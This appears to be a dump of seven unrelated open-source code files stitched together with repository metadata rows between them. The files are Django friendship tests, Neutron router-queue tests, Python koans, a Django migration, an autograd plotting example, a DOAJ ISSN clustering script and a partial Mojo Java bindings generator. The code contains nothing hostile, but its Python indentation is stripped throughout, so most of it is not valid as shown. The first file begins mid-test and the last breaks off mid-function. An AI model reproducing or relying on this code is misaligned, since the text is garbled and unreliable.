self.assertEqual(len(Friend.objects.read_requests(self.user_amy)), 1)
# Ensure we can't be friends with ourselves
with self.assertRaises(ValidationError):
Friend.objects.add_friend(self.user_bob, self.user_bob)
# Ensure we can't do it manually either
with self.assertRaises(ValidationError):
Friend.objects.create(to_user=self.user_bob, from_user=self.user_bob)
def test_multiple_friendship_requests(self):
""" Ensure multiple friendship requests are handled properly """
### Bob wants to be friends with Steve
req1 = Friend.objects.add_friend(self.user_bob, self.user_steve)
# Ensure neither have friends already
self.assertEqual(Friend.objects.friends(self.user_bob), [])
self.assertEqual(Friend.objects.friends(self.user_steve), [])
# Ensure FriendshipRequest is created
self.assertEqual(FriendshipRequest.objects.filter(from_user=self.user_bob).count(), 1)
self.assertEqual(FriendshipRequest.objects.filter(to_user=self.user_steve).count(), 1)
self.assertEqual(Friend.objects.unread_request_count(self.user_steve), 1)
# Steve also wants to be friends with Bob before Bob replies
req2 = Friend.objects.add_friend(self.user_steve, self.user_bob)
# Ensure they aren't friends at this point
self.assertFalse(Friend.objects.are_friends(self.user_bob, self.user_steve))
# Accept the request
req1.accept()
# Ensure neither have pending requests
self.assertEqual(FriendshipRequest.objects.filter(from_user=self.user_bob).count(), 0)
self.assertEqual(FriendshipRequest.objects.filter(to_user=self.user_steve).count(), 0)
self.assertEqual(FriendshipRequest.objects.filter(from_user=self.user_steve).count(), 0)
self.assertEqual(FriendshipRequest.objects.filter(to_user=self.user_bob).count(), 0)
def test_following(self):
# Bob follows Steve
req1 = Follow.objects.add_follower(self.user_bob, self.user_steve)
self.assertEqual(len(Follow.objects.followers(self.user_steve)), 1)
self.assertEqual(len(Follow.objects.following(self.user_bob)), 1)
self.assertEqual(Follow.objects.followers(self.user_steve), [self.user_bob])
self.assertEqual(Follow.objects.following(self.user_bob), [self.user_steve])
self.assertTrue(Follow.objects.follows(self.user_bob, self.user_steve))
self.assertFalse(Follow.objects.follows(self.user_steve, self.user_bob))
# Duplicated requests raise a more specific subclass of IntegrityError.
with self.assertRaises(IntegrityError):
Follow.objects.add_follower(self.user_bob, self.user_steve)
with self.assertRaises(AlreadyExistsError):
Follow.objects.add_follower(self.user_bob, self.user_steve)
# Remove the relationship
self.assertTrue(Follow.objects.remove_follower(self.user_bob, self.user_steve))
self.assertEqual(len(Follow.objects.followers(self.user_steve)), 0)
self.assertEqual(len(Follow.objects.following(self.user_bob)), 0)
self.assertFalse(Follow.objects.follows(self.user_bob, self.user_steve))
# Ensure we canot follow ourselves
with self.assertRaises(ValidationError):
Follow.objects.add_follower(self.user_bob, self.user_bob)
with self.assertRaises(ValidationError):
Follow.objects.create(follower=self.user_bob, followee=self.user_bob)
class FriendshipViewTests(BaseTestCase):
def setUp(self):
super(FriendshipViewTests, self).setUp()
self.friendship_request = Friend.objects.add_friend(self.user_steve, self.user_bob)
def test_friendship_view_users(self):
url = reverse('friendship_view_users')
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse200(response)
with self.settings(FRIENDSHIP_CONTEXT_OBJECT_LIST_NAME='object_list', TEMPLATE_DIRS=(TEST_TEMPLATES,)):
response = self.client.get(url)
self.assertResponse200(response)
self.assertTrue('object_list' in response.context)
def test_friendship_view_friends(self):
url = reverse('friendship_view_friends', kwargs={'username': self.user_bob.username})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse200(response)
self.assertTrue('user' in response.context)
with self.settings(FRIENDSHIP_CONTEXT_OBJECT_NAME='object', TEMPLATE_DIRS=(TEST_TEMPLATES,)):
response = self.client.get(url)
self.assertResponse200(response)
self.assertTrue('object' in response.context)
def test_friendship_add_friend(self):
url = reverse('friendship_add_friend', kwargs={'to_username': self.user_amy.username})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
# if we don't POST the view should return the
# friendship_add_friend view
response = self.client.get(url)
self.assertResponse200(response)
# on POST accept the friendship request and redirect to the
# friendship_request_list view
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_request_list')
self.assertTrue(redirect_url in response['Location'])
def test_friendship_add_friend_dupe(self):
url = reverse('friendship_add_friend', kwargs={'to_username': self.user_amy.username})
with self.login(self.user_bob.username, self.user_pw):
# if we don't POST the view should return the
# friendship_add_friend view
# on POST accept the friendship request and redirect to the
# friendship_request_list view
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_request_list')
self.assertTrue(redirect_url in response['Location'])
response = self.client.post(url)
self.assertResponse200(response)
self.assertTrue('errors' in response.context)
self.assertEqual(response.context['errors'], ['Friendship already requested'])
def test_friendship_requests(self):
url = reverse('friendship_request_list')
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
response = self.client.get(url)
self.assertResponse200(response)
def test_friendship_requests_rejected(self):
url = reverse('friendship_requests_rejected')
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
response = self.client.get(url)
self.assertResponse200(response)
def test_friendship_accept(self):
url = reverse('friendship_accept', kwargs={'friendship_request_id': self.friendship_request.pk})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
# if we don't POST the view should return the
# friendship_requests_detail view
response = self.client.get(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_requests_detail', kwargs={'friendship_request_id': self.friendship_request.pk})
self.assertTrue(redirect_url in response['Location'])
# on POST accept the friendship request and redirect to the
# friendship_view_friends view
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_view_friends', kwargs={'username': self.user_bob.username})
self.assertTrue(redirect_url in response['Location'])
with self.login(self.user_steve.username, self.user_pw):
# on POST try to accept the friendship request
# but I am logged in as Steve, so I cannot accept
# a request sent to Bob
response = self.client.post(url)
self.assertResponse404(response)
def test_friendship_reject(self):
url = reverse('friendship_reject', kwargs={'friendship_request_id': self.friendship_request.pk})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
# if we don't POST the view should return the
# friendship_requests_detail view
response = self.client.get(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_requests_detail', kwargs={'friendship_request_id': self.friendship_request.pk})
self.assertTrue(redirect_url in response['Location'])
# on POST reject the friendship request and redirect to the
# friendship_requests view
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_request_list')
self.assertTrue(redirect_url in response['Location'])
with self.login(self.user_steve.username, self.user_pw):
# on POST try to reject the friendship request
# but I am logged in as Steve, so I cannot reject
# a request sent to Bob
response = self.client.post(url)
self.assertResponse404(response)
def test_friendship_cancel(self):
url = reverse('friendship_cancel', kwargs={'friendship_request_id': self.friendship_request.pk})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
# if we don't POST the view should return the
# friendship_requests_detail view
response = self.client.get(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_requests_detail', kwargs={'friendship_request_id': self.friendship_request.pk})
self.assertTrue(redirect_url in response['Location'])
# on POST try to cancel the friendship request
# but I am logged in as Bob, so I cannot cancel
# a request made by Steve
response = self.client.post(url)
self.assertResponse404(response)
with self.login(self.user_steve.username, self.user_pw):
# on POST cancel the friendship request and redirect to the
# friendship_requests view
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_request_list')
self.assertTrue(redirect_url in response['Location'])
def test_friendship_requests_detail(self):
url = reverse('friendship_requests_detail', kwargs={'friendship_request_id': self.friendship_request.pk})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
response = self.client.get(url)
self.assertResponse200(response)
def test_friendship_followers(self):
url = reverse('friendship_followers', kwargs={'username': 'bob'})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse200(response)
with self.settings(FRIENDSHIP_CONTEXT_OBJECT_NAME='object', TEMPLATE_DIRS=(TEST_TEMPLATES,)):
response = self.client.get(url)
self.assertResponse200(response)
self.assertTrue('object' in response.context)
def test_friendship_following(self):
url = reverse('friendship_following', kwargs={'username': 'bob'})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse200(response)
with self.settings(FRIENDSHIP_CONTEXT_OBJECT_NAME='object', TEMPLATE_DIRS=(TEST_TEMPLATES,)):
response = self.client.get(url)
self.assertResponse200(response)
self.assertTrue('object' in response.context)
def test_follower_add(self):
url = reverse('follower_add', kwargs={'followee_username': self.user_amy.username})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
response = self.client.get(url)
self.assertResponse200(response)
# on POST accept the friendship request and redirect to the
# friendship_following view
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_following', kwargs={'username': self.user_bob.username})
self.assertTrue(redirect_url in response['Location'])
response = self.client.post(url)
self.assertResponse200(response)
self.assertTrue('errors' in response.context)
self.assertEqual(response.context['errors'], ["User 'bob' already follows 'amy'"])
def test_follower_remove(self):
# create a follow relationship so we can test removing a follower
follow = Follow.objects.add_follower(self.user_bob, self.user_amy)
url = reverse('follower_remove', kwargs={'followee_username': self.user_amy.username})
# test that the view requires authentication to access it
response = self.client.get(url)
self.assertResponse302(response)
with self.login(self.user_bob.username, self.user_pw):
response = self.client.get(url)
self.assertResponse200(response)
response = self.client.post(url)
self.assertResponse302(response)
redirect_url = reverse('friendship_following', kwargs={'username': self.user_bob.username})
self.assertTrue(redirect_url in response['Location'])
| bsd-3-clause | 7,800,063,079,491,069,000 | 43.460084 | 126 | 0.66758 | false |
blueboxgroup/neutron | neutron/tests/unit/test_router_processing_queue.py | 27 | 4074 | # Copyright 2014 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import datetime
from neutron.agent.l3 import router_processing_queue as l3_queue
from neutron.openstack.common import uuidutils
from neutron.tests import base
_uuid = uuidutils.generate_uuid
FAKE_ID = _uuid()
FAKE_ID_2 = _uuid()
class TestExclusiveRouterProcessor(base.BaseTestCase):
def setUp(self):
super(TestExclusiveRouterProcessor, self).setUp()
def test_i_am_master(self):
master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
not_master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
master_2 = l3_queue.ExclusiveRouterProcessor(FAKE_ID_2)
not_master_2 = l3_queue.ExclusiveRouterProcessor(FAKE_ID_2)
self.assertTrue(master._i_am_master())
self.assertFalse(not_master._i_am_master())
self.assertTrue(master_2._i_am_master())
self.assertFalse(not_master_2._i_am_master())
master.__exit__(None, None, None)
master_2.__exit__(None, None, None)
def test_master(self):
master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
not_master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
master_2 = l3_queue.ExclusiveRouterProcessor(FAKE_ID_2)
not_master_2 = l3_queue.ExclusiveRouterProcessor(FAKE_ID_2)
self.assertEqual(master._master, master)
self.assertEqual(not_master._master, master)
self.assertEqual(master_2._master, master_2)
self.assertEqual(not_master_2._master, master_2)
master.__exit__(None, None, None)
master_2.__exit__(None, None, None)
def test__enter__(self):
self.assertFalse(FAKE_ID in l3_queue.ExclusiveRouterProcessor._masters)
master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
master.__enter__()
self.assertTrue(FAKE_ID in l3_queue.ExclusiveRouterProcessor._masters)
master.__exit__(None, None, None)
def test__exit__(self):
master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
not_master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
master.__enter__()
self.assertTrue(FAKE_ID in l3_queue.ExclusiveRouterProcessor._masters)
not_master.__enter__()
not_master.__exit__(None, None, None)
self.assertTrue(FAKE_ID in l3_queue.ExclusiveRouterProcessor._masters)
master.__exit__(None, None, None)
self.assertFalse(FAKE_ID in l3_queue.ExclusiveRouterProcessor._masters)
def test_data_fetched_since(self):
master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
self.assertEqual(master._get_router_data_timestamp(),
datetime.datetime.min)
ts1 = datetime.datetime.utcnow() - datetime.timedelta(seconds=10)
ts2 = datetime.datetime.utcnow()
master.fetched_and_processed(ts2)
self.assertEqual(master._get_router_data_timestamp(), ts2)
master.fetched_and_processed(ts1)
self.assertEqual(master._get_router_data_timestamp(), ts2)
master.__exit__(None, None, None)
def test_updates(self):
master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
not_master = l3_queue.ExclusiveRouterProcessor(FAKE_ID)
master.queue_update(l3_queue.RouterUpdate(FAKE_ID, 0))
not_master.queue_update(l3_queue.RouterUpdate(FAKE_ID, 0))
for update in not_master.updates():
raise Exception("Only the master should process a router")
self.assertEqual(2, len([i for i in master.updates()]))
| apache-2.0 | 1,159,734,980,378,708,200 | 38.941176 | 79 | 0.678203 | false |
maithreyee/python-koans | python2/koans/about_asserts.py | 8 | 2283 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutAsserts(Koan):
def test_assert_truth(self):
"""
We shall contemplate truth by testing reality, via asserts.
"""
# Confused? This video should help:
#
# http://bit.ly/about_asserts
self.assertTrue(True) # This should be True
def test_assert_with_message(self):
"""
Enlightenment may be more easily achieved with appropriate messages.
"""
self.assertTrue(True, "This should be True -- Please fix this")
def test_fill_in_values(self):
"""
Sometimes we will ask you to fill in the values
"""
self.assertEqual(2, 1 + 1)
def test_assert_equality(self):
"""
To understand reality, we must compare our expectations against
reality.
"""
expected_value = 2
actual_value = 1 + 1
self.assertTrue(expected_value == actual_value)
def test_a_better_way_of_asserting_equality(self):
"""
Some ways of asserting equality are better than others.
"""
expected_value = 2
actual_value = 1 + 1
self.assertEqual(expected_value, actual_value)
def test_that_unittest_asserts_work_the_same_way_as_python_asserts(self):
"""
Understand what lies within.
"""
# This throws an AssertionError exception
assert True
def test_that_sometimes_we_need_to_know_the_class_type(self):
"""
What is in a class name?
"""
# Sometimes we will ask you what the class type of an object is.
#
# For example, contemplate the text string "navel". What is its class type?
# The koans runner will include this feedback for this koan:
#
# AssertionError: '-=> FILL ME IN! <=-' != <type 'str'>
#
# So "navel".__class__ is equal to <type 'str'>? No not quite. This
# is just what it displays. The answer is simply str.
#
# See for yourself:
self.assertEqual(str, "navel".__class__) # It's str, not <type 'str'>
# Need an illustration? More reading can be found here:
#
# http://bit.ly/__class__
| mit | -2,227,563,967,843,542,800 | 27.898734 | 83 | 0.573368 | false |
uw-it-aca/mdot-rest | mdot_rest/migrations/0011_auto_20200528_1858.py | 1 | 1540 | # Generated by Django 2.1.15 on 2020-05-28 18:58
from django.db import migrations, models
import django.db.models.deletion
import mdot_rest.optimizedpngfield
class Migration(migrations.Migration):
dependencies = [
('mdot_rest', '0010_auto_20150917_2154'),
]
operations = [
migrations.AlterModelOptions(
name='intendedaudience',
options={'default_related_name': 'intended_audiences'},
),
migrations.AlterModelOptions(
name='resourcelink',
options={'default_related_name': 'resource_links'},
),
migrations.AlterField(
model_name='intendedaudience',
name='resource',
field=models.ManyToManyField(related_name='intended_audiences', to='mdot_rest.UWResource'),
),
migrations.AlterField(
model_name='resourcelink',
name='link_type',
field=models.CharField(choices=[('AND', 'Android'), ('IOS', 'iOS'), ('WEB', 'Web'), ('WIP', 'Windows Phone')], max_length=3),
),
migrations.AlterField(
model_name='resourcelink',
name='resource',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='resource_links', to='mdot_rest.UWResource'),
),
migrations.AlterField(
model_name='uwresource',
name='image',
field=mdot_rest.optimizedpngfield.OptimizedPNGImageField(blank=True, null=True, upload_to='uploads'),
),
]
| apache-2.0 | 7,037,338,330,995,369,000 | 34.813953 | 139 | 0.601299 | false |
kcarnold/autograd | examples/sinusoid.py | 3 | 1098 | from __future__ import absolute_import
from __future__ import print_function
import autograd.numpy as np
import matplotlib.pyplot as plt
from autograd import grad
from builtins import range, map
def fun(x):
return np.sin(x)
d_fun = grad(fun) # First derivative
dd_fun = grad(d_fun) # Second derivative
x = np.linspace(-10, 10, 100)
plt.plot(x, list(map(fun, x)), x, list(map(d_fun, x)), x, list(map(dd_fun, x)))
plt.xlim([-10, 10])
plt.ylim([-1.2, 1.2])
plt.axis('off')
plt.savefig("sinusoid.png")
plt.clf()
# Taylor approximation to sin function
def fun(x):
currterm = x
ans = currterm
for i in range(1000):
print(i, end=' ')
currterm = - currterm * x ** 2 / ((2 * i + 3) * (2 * i + 2))
ans = ans + currterm
if np.abs(currterm) < 0.2: break # (Very generous tolerance!)
return ans
d_fun = grad(fun)
dd_fun = grad(d_fun)
x = np.linspace(-10, 10, 100)
plt.plot(x, list(map(fun, x)), x, list(map(d_fun, x)), x, list(map(dd_fun, x)))
plt.xlim([-10, 10])
plt.ylim([-1.2, 1.2])
plt.axis('off')
plt.savefig("sinusoid_taylor.png")
plt.clf()
| mit | -1,790,430,366,374,978,300 | 23.4 | 79 | 0.619308 | false |
DOAJ/doaj | portality/migrate/st2cl/cluster2.py | 1 | 7506 | from lxml import etree
from copy import deepcopy
import csv
IN = "/home/richard/Dropbox/Documents/DOAJ/data/journals"
OUT = "/home/richard/tmp/doaj/equiv.csv"
def extract_issns(element):
issn = j.find("issn").text
nissn = j.find("nextIssn").text
pissn = j.find("previousIssn").text
eissn = j.find("eissn").text
neissn = j.find("nextEissn").text
peissn = j.find("previousEissn").text
issns = []
if issn is not None:
issns.append(issn)
if nissn is not None:
issns.append(nissn)
if pissn is not None:
issns.append(pissn)
if eissn is not None:
issns.append(eissn)
if neissn is not None:
issns.append(neissn)
if peissn is not None:
issns.append(peissn)
return issns
f = open(IN)
xml = etree.parse(f)
f.close()
journals = xml.getroot()
journaltable = {}
idtable = {}
reltable = {}
# first job is to separate the journals and the issns, joined by a common id
# and to index each issn to the id in which it appears
id = 0
for j in journals:
journaltable[id] = j
idtable[id] = extract_issns(j)
for issn in idtable[id]:
if issn in reltable:
reltable[issn].append(id)
else:
reltable[issn] = [id]
id += 1
print(len(journals), "journal records; ", len(list(idtable.keys())), "join identifiers; ", len(list(reltable.keys())), "unique issns")
count_register = {}
for id, issns in idtable.items():
size = len(issns)
if size in count_register:
count_register[size] += 1
else:
count_register[size] = 1
print("journal record to issn count statistics: ", count_register)
mapregister = {}
for issn, ids in reltable.items():
size = len(ids)
if size in mapregister:
mapregister[size] += 1
else:
mapregister[size] = 1
print("issn to journal record count statistics: ", mapregister)
def process(id, register):
if id in register:
return
register.append(id)
queue = []
issns = idtable.get(id, [])
for issn in issns:
ids = reltable.get(issn, [])
for i in ids:
if i in register: continue
if i not in queue: queue.append(i)
for q in queue:
process(q, register)
equiv_table = {}
processed = []
i = 0
for id in idtable.keys():
if id in processed:
continue
register = []
process(id, register)
processed += deepcopy(register)
equiv_table[i] = deepcopy(register)
i += 1
print(len(processed), "join ids considered")
process_register = {}
for p in processed:
if p in process_register:
process_register[p] += 1
else:
process_register[p] = 1
multiples = [(k, v) for k, v in process_register.items() if v > 1]
print("join ids considered more than once:", multiples)
if len(multiples) > 0:
print("issns associated with join ids considered more than once:")
for k, v in multiples:
issns = idtable.get(k)
print(k, "->", issns)
for issn in issns:
print(" ", issn, "->", reltable.get(issn, []))
for rel in reltable.get(issn, []):
print(" ", rel, "->", idtable.get(rel))
print(len(equiv_table.keys()), "equivalences identified")
equivregister = {}
idregister = {}
multiequiv = {}
counter = 0
for i, ids in equiv_table.items():
# count the size of the equivalences
size = len(ids)
if size in equivregister:
equivregister[size] += 1
else:
equivregister[size] = 1
# determine the count of ids in the equivalence table
for jid in ids:
if jid in idregister:
idregister[jid] += 1
else:
idregister[jid] = 1
# build a list of all those equivalences which have more than one journal record
if size > 1:
multiequiv[i] = ids
counter += size
multiids = [(k, v) for k, v in idregister.items() if v > 1]
print("equivalence register statistics: ", equivregister)
print("join ids which appear in more than one equivalence", multiids)
print(counter, "total issns in equivalence table")
for k, v in multiequiv.items():
print(k, "->", v)
for jid in v:
print(" ", jid, "->", idtable.get(jid))
ordertables = {}
for e, jids in multiequiv.items():
ordertable = {}
for jid in jids:
ordertable[jid] = {"n" : [], "p": []}
element = journaltable.get(jid)
ne = element.find("nextEissn").text
np = element.find("nextIssn").text
pe = element.find("previousEissn").text
pp = element.find("previousIssn").text
if ne is not None: ne = ne.upper()
if np is not None: np = np.upper()
if pe is not None: pe = pe.upper()
if pp is not None: pp = pp.upper()
for jid2 in jids:
if jid2 == jid: continue
e2 = journaltable.get(jid2)
eissn = e2.find("issn").text
pissn = e2.find("eissn").text
if eissn is not None: eissn = eissn.upper()
if pissn is not None: pissn = pissn.upper()
if (ne is not None and ne in [pissn, eissn]) or (np is not None and np in [pissn, eissn]):
ordertable[jid]["n"].append(jid2)
if (pe is not None and pe in [pissn, eissn]) or (pp is not None and pp in [pissn, eissn]):
ordertable[jid]["p"].append(jid2)
ordertables[e] = ordertable
"""
print "equivalences and their ordered relations of join identifiers"
for e, o in ordertables.items():
print e, "->", o
"""
sorttable = {}
for e, ot in ordertables.items():
first = []
last = []
middle = []
for k, r in ot.items():
if len(r.get("n")) == 0:
first.append(k)
elif len(r.get("p")) == 0:
last.append(k)
else:
middle.append(k)
sorttable[e] = first + middle + last
canontable = {}
for e, sort in sorttable.items():
canon = None
i = 0
found = False
for s in sort:
element = journaltable.get(s)
doaj = element.find("doaj").text
if doaj is not None and doaj.upper() == "Y":
canon = s
found = True
break
i += 1
if not found:
i = 0
canon = sort[0]
rest = deepcopy(sort)
del rest[i]
canontable[e] = (canon, rest)
print("canonicalised, ordered equivalences and the relations they are derived from")
for k in list(ordertables.keys()):
print(k, "->", ordertables.get(k))
print(" ->", sorttable.get(k))
print(" ->", canontable.get(k))
def get_issn_cell(jid):
element = journaltable.get(jid)
issn = element.find("issn").text
eissn = element.find("eissn").text
issns = []
if issn is not None: issns.append(issn)
if eissn is not None: issns.append(eissn)
cell = ", ".join(issns)
return cell
def get_title_cell(jid):
element = journaltable.get(jid)
title = element.find("title").text.encode("ascii", "ignore")
return title
f = open(OUT, "wb")
writer = csv.writer(f)
writer.writerow(["Equivalence Number", "Proposed Current Title", "Proposed Current ISSNs", "Proposed History: Title/ISSNs"])
for e, data in canontable.items():
canon, rest = data
cells = [e]
canon_issn_cell = get_issn_cell(canon)
cells.append(get_title_cell(canon))
cells.append(canon_issn_cell)
for r in rest:
r_issn_cell = get_issn_cell(r)
cells.append(get_title_cell(r))
cells.append(r_issn_cell)
writer.writerow(cells)
| apache-2.0 | -4,878,603,315,626,738,000 | 26.903346 | 134 | 0.593125 | false |
android-ia/platform_external_chromium_org | mojo/public/tools/bindings/generators/mojom_java_generator.py | 25 | 17838 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generates java source files from a mojom.Module."""
import argparse
import ast
import contextlib
import os
import re
import shutil
import tempfile
import zipfile
from jinja2 import contextfilter
import mojom.generate.generator as generator
import mojom.generate.module as mojom
from mojom.generate.template_expander import UseJinja
GENERATOR_PREFIX = 'java'
_HEADER_SIZE = 8
_spec_to_java_type = {
mojom.BOOL.spec: 'boolean',
mojom.DCPIPE.spec: 'org.chromium.mojo.system.DataPipe.ConsumerHandle',
mojom.DOUBLE.spec: 'double',
mojom.DPPIPE.spec: 'org.chromium.mojo.system.DataPipe.ProducerHandle',
mojom.FLOAT.spec: 'float',
mojom.HANDLE.spec: 'org.chromium.mojo.system.UntypedHandle',
mojom.INT16.spec: 'short',
mojom.INT32.spec: 'int',
mojom.INT64.spec: 'long',
mojom.INT8.spec: 'byte',
mojom.MSGPIPE.spec: 'org.chromium.mojo.system.MessagePipeHandle',
mojom.NULLABLE_DCPIPE.spec:
'org.chromium.mojo.system.DataPipe.ConsumerHandle',
mojom.NULLABLE_DPPIPE.spec:
'org.chromium.mojo.system.DataPipe.ProducerHandle',
mojom.NULLABLE_HANDLE.spec: 'org.chromium.mojo.system.UntypedHandle',
mojom.NULLABLE_MSGPIPE.spec: 'org.chromium.mojo.system.MessagePipeHandle',
mojom.NULLABLE_SHAREDBUFFER.spec:
'org.chromium.mojo.system.SharedBufferHandle',
mojom.NULLABLE_STRING.spec: 'String',
mojom.SHAREDBUFFER.spec: 'org.chromium.mojo.system.SharedBufferHandle',
mojom.STRING.spec: 'String',
mojom.UINT16.spec: 'short',
mojom.UINT32.spec: 'int',
mojom.UINT64.spec: 'long',
mojom.UINT8.spec: 'byte',
}
_spec_to_decode_method = {
mojom.BOOL.spec: 'readBoolean',
mojom.DCPIPE.spec: 'readConsumerHandle',
mojom.DOUBLE.spec: 'readDouble',
mojom.DPPIPE.spec: 'readProducerHandle',
mojom.FLOAT.spec: 'readFloat',
mojom.HANDLE.spec: 'readUntypedHandle',
mojom.INT16.spec: 'readShort',
mojom.INT32.spec: 'readInt',
mojom.INT64.spec: 'readLong',
mojom.INT8.spec: 'readByte',
mojom.MSGPIPE.spec: 'readMessagePipeHandle',
mojom.NULLABLE_DCPIPE.spec: 'readConsumerHandle',
mojom.NULLABLE_DPPIPE.spec: 'readProducerHandle',
mojom.NULLABLE_HANDLE.spec: 'readUntypedHandle',
mojom.NULLABLE_MSGPIPE.spec: 'readMessagePipeHandle',
mojom.NULLABLE_SHAREDBUFFER.spec: 'readSharedBufferHandle',
mojom.NULLABLE_STRING.spec: 'readString',
mojom.SHAREDBUFFER.spec: 'readSharedBufferHandle',
mojom.STRING.spec: 'readString',
mojom.UINT16.spec: 'readShort',
mojom.UINT32.spec: 'readInt',
mojom.UINT64.spec: 'readLong',
mojom.UINT8.spec: 'readByte',
}
_java_primitive_to_boxed_type = {
'boolean': 'Boolean',
'byte': 'Byte',
'double': 'Double',
'float': 'Float',
'int': 'Integer',
'long': 'Long',
'short': 'Short',
}
def NameToComponent(name):
# insert '_' between anything and a Title name (e.g, HTTPEntry2FooBar ->
# HTTP_Entry2_FooBar)
name = re.sub('([^_])([A-Z][^A-Z_]+)', r'\1_\2', name)
# insert '_' between non upper and start of upper blocks (e.g.,
# HTTP_Entry2_FooBar -> HTTP_Entry2_Foo_Bar)
name = re.sub('([^A-Z_])([A-Z])', r'\1_\2', name)
return [x.lower() for x in name.split('_')]
def UpperCamelCase(name):
return ''.join([x.capitalize() for x in NameToComponent(name)])
def CamelCase(name):
uccc = UpperCamelCase(name)
return uccc[0].lower() + uccc[1:]
def ConstantStyle(name):
components = NameToComponent(name)
if components[0] == 'k':
components = components[1:]
return '_'.join([x.upper() for x in components])
def GetNameForElement(element):
if (mojom.IsEnumKind(element) or mojom.IsInterfaceKind(element) or
mojom.IsStructKind(element)):
return UpperCamelCase(element.name)
if mojom.IsInterfaceRequestKind(element):
return GetNameForElement(element.kind)
if isinstance(element, (mojom.Method,
mojom.Parameter,
mojom.Field)):
return CamelCase(element.name)
if isinstance(element, mojom.EnumValue):
return (GetNameForElement(element.enum) + '.' +
ConstantStyle(element.name))
if isinstance(element, (mojom.NamedValue,
mojom.Constant)):
return ConstantStyle(element.name)
raise Exception('Unexpected element: ' % element)
def GetInterfaceResponseName(method):
return UpperCamelCase(method.name + 'Response')
def ParseStringAttribute(attribute):
assert isinstance(attribute, basestring)
return attribute
def GetJavaTrueFalse(value):
return 'true' if value else 'false'
def GetArrayNullabilityFlags(kind):
"""Returns nullability flags for an array type, see Decoder.java.
As we have dedicated decoding functions for arrays, we have to pass
nullability information about both the array itself, as well as the array
element type there.
"""
assert mojom.IsAnyArrayKind(kind)
ARRAY_NULLABLE = \
'org.chromium.mojo.bindings.BindingsHelper.ARRAY_NULLABLE'
ELEMENT_NULLABLE = \
'org.chromium.mojo.bindings.BindingsHelper.ELEMENT_NULLABLE'
NOTHING_NULLABLE = \
'org.chromium.mojo.bindings.BindingsHelper.NOTHING_NULLABLE'
flags_to_set = []
if mojom.IsNullableKind(kind):
flags_to_set.append(ARRAY_NULLABLE)
if mojom.IsNullableKind(kind.kind):
flags_to_set.append(ELEMENT_NULLABLE)
if not flags_to_set:
flags_to_set = [NOTHING_NULLABLE]
return ' | '.join(flags_to_set)
def AppendEncodeDecodeParams(initial_params, context, kind, bit):
""" Appends standard parameters shared between encode and decode calls. """
params = list(initial_params)
if (kind == mojom.BOOL):
params.append(str(bit))
if mojom.IsReferenceKind(kind):
if mojom.IsAnyArrayKind(kind):
params.append(GetArrayNullabilityFlags(kind))
else:
params.append(GetJavaTrueFalse(mojom.IsNullableKind(kind)))
if mojom.IsAnyArrayKind(kind):
if mojom.IsFixedArrayKind(kind):
params.append(str(kind.length))
else:
params.append(
'org.chromium.mojo.bindings.BindingsHelper.UNSPECIFIED_ARRAY_LENGTH');
if mojom.IsInterfaceKind(kind):
params.append('%s.MANAGER' % GetJavaType(context, kind))
if mojom.IsAnyArrayKind(kind) and mojom.IsInterfaceKind(kind.kind):
params.append('%s.MANAGER' % GetJavaType(context, kind.kind))
return params
@contextfilter
def DecodeMethod(context, kind, offset, bit):
def _DecodeMethodName(kind):
if mojom.IsAnyArrayKind(kind):
return _DecodeMethodName(kind.kind) + 's'
if mojom.IsEnumKind(kind):
return _DecodeMethodName(mojom.INT32)
if mojom.IsInterfaceRequestKind(kind):
return 'readInterfaceRequest'
if mojom.IsInterfaceKind(kind):
return 'readServiceInterface'
return _spec_to_decode_method[kind.spec]
methodName = _DecodeMethodName(kind)
params = AppendEncodeDecodeParams([ str(offset) ], context, kind, bit)
